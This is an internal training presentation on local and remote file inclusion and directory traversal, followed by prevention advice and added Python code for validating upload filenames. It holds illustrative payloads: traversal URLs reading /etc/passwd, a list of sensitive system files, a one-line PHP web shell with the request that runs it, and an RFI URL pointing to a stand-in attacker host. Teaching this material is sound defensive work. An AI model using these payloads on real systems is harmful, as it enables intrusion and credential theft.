File Upload Vulnerabilities
A presentation given internally in March 2023 by Avanthika Anand
File Upload Vulnerabilities
● Occurs when a web application allows users to submit input to files or upload files to the server.
● Allows an attacker to read or execute files on the victim's machine.
● Types of file upload vulnerabilities:
  ○ Local file inclusion (LFI)
  ○ Remote file inclusion (RFI)
What is LFI?
An LFI can trick the website into exposing or running files on the web server. An LFI can lead to information disclosure, remote code execution or even XSS.
This vulnerability exists when a web application includes a file without correctly sanitising the input, allowing an attacker to manipulate the input, inject path traversal characters and include other files from the web server.
LFI Example
http://example-website.com/?file=filename.php
http://example-website.com/?file=../../../etc/passwd
In the absence of proper filtering, the server will display the sensitive content of the /etc/passwd file and the attacker will be able to gain host-related information.
Uploading a PHP file with the following code may result in command injection:
<?php echo system($_GET['command']); ?>
GET /example/exploit.php?command=id HTTP/1.1
The parameters that can be given are not limited to /etc/passwd. There are a lot more:
● /etc/issue
● /proc/version
● /etc/profile
● /etc/passwd
● /etc/shadow
● /root/.bash_history
Directory Traversal
Even without the ability to upload and execute code, a Local File Inclusion vulnerability can be dangerous. An attacker can still perform a Directory Traversal / Path Traversal attack using an LFI vulnerability as follows.
http://example.com/?file=../../../../etc/passwd
The expression ../ instructs the system to go one directory up, which is a directive understood by the operating system. The attacker has to guess how many directories to go up to reach the target directory (for example the Windows folder on a Windows host), but this is easily done by trial and error.
LABS
1. RCE via web shell upload (Link)
2. Content-type bypass (Link)
What is RFI?
● Similar to LFI.
● Allows an external URL to be injected. The attacker can execute malicious code from an external source instead of accessing a file on the local web server.
● When web applications allow user input, such as a URL or parameter value, and pass it to the "file include" mechanism without proper sanitization, attackers can manipulate the web application to include remote files with malicious scripts.
● Targets vulnerabilities in web applications that dynamically reference external scripts.
● Attackers can exploit RFI vulnerabilities by crafting a URL that points to a malicious file on a remote server, and then tricking a user into visiting the URL or injecting the URL into a web page that the user visits.
● Developers forget to disable the "allow_url_include" setting in the PHP configuration file, causing an RFI vulnerability to arise in the web application.
RFI Example http://example.com/vulnerable.php?file=http://attacker.com/malicious.txt
LFI and RFI demo in DVWA
Download the source code: https://github.com/cytopia/docker-dvwa
Go to http://localhost:8000
How to prevent?
● Check the file extension against a whitelist of permitted extensions rather than a blacklist of prohibited ones. It's much easier to decide which extensions you want to allow than it is to guess which ones an attacker might try to upload.
● Make sure the filename doesn't contain any substrings that may be interpreted as a directory or a traversal sequence (../).
● Rename uploaded files to avoid collisions that may cause existing files to be overwritten.
● Do not upload files to the server's permanent filesystem until they have been fully validated.
● As much as possible, use an established framework for preprocessing file uploads rather than attempting to write your own validation mechanisms.
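The prevention list above, as an added Python example (not code from the presentation): a filename validator that rejects traversal sequences, matches the extension against an allowlist, and replaces the client-supplied name with a random server-chosen one. The allowlist contents and the upload directory path are assumptions.

```python
import re
import secrets
from pathlib import Path

# Assumed allowlist for a hypothetical image/document upload endpoint.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}

# Anything that could be read as a directory separator, a traversal
# sequence (../) or a null byte used to cut the name short.
TRAVERSAL_PATTERN = re.compile(r"(\.\.|[/\\]|\x00)")


class UploadRejected(ValueError):
    """Raised when a client-supplied filename fails validation."""


def validate_upload_name(client_filename: str) -> str:
    """Validate the client-supplied name and return a server-chosen one.

    Traversal substrings are rejected outright, the extension is checked
    against an allowlist (never a blocklist), and the stored name becomes a
    random token plus the single validated extension, so the upload can
    neither overwrite an existing file nor keep a double extension such as
    "shell.php.jpg".
    """
    if not client_filename or TRAVERSAL_PATTERN.search(client_filename):
        raise UploadRejected("filename contains a path or traversal sequence")
    if "." not in client_filename:
        raise UploadRejected("filename has no extension")
    ext = client_filename.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension {ext!r} is not permitted")
    return f"{secrets.token_hex(16)}.{ext}"


def storage_path(upload_dir: str, stored_name: str) -> Path:
    """Resolve the final path and confirm it stays inside upload_dir.

    Defence in depth: even if a name slipped past validate_upload_name,
    a resolved path whose parent is not the upload directory is refused.
    """
    base = Path(upload_dir).resolve()
    target = (base / stored_name).resolve()
    if target.parent != base:
        raise UploadRejected("resolved path escapes the upload directory")
    return target
```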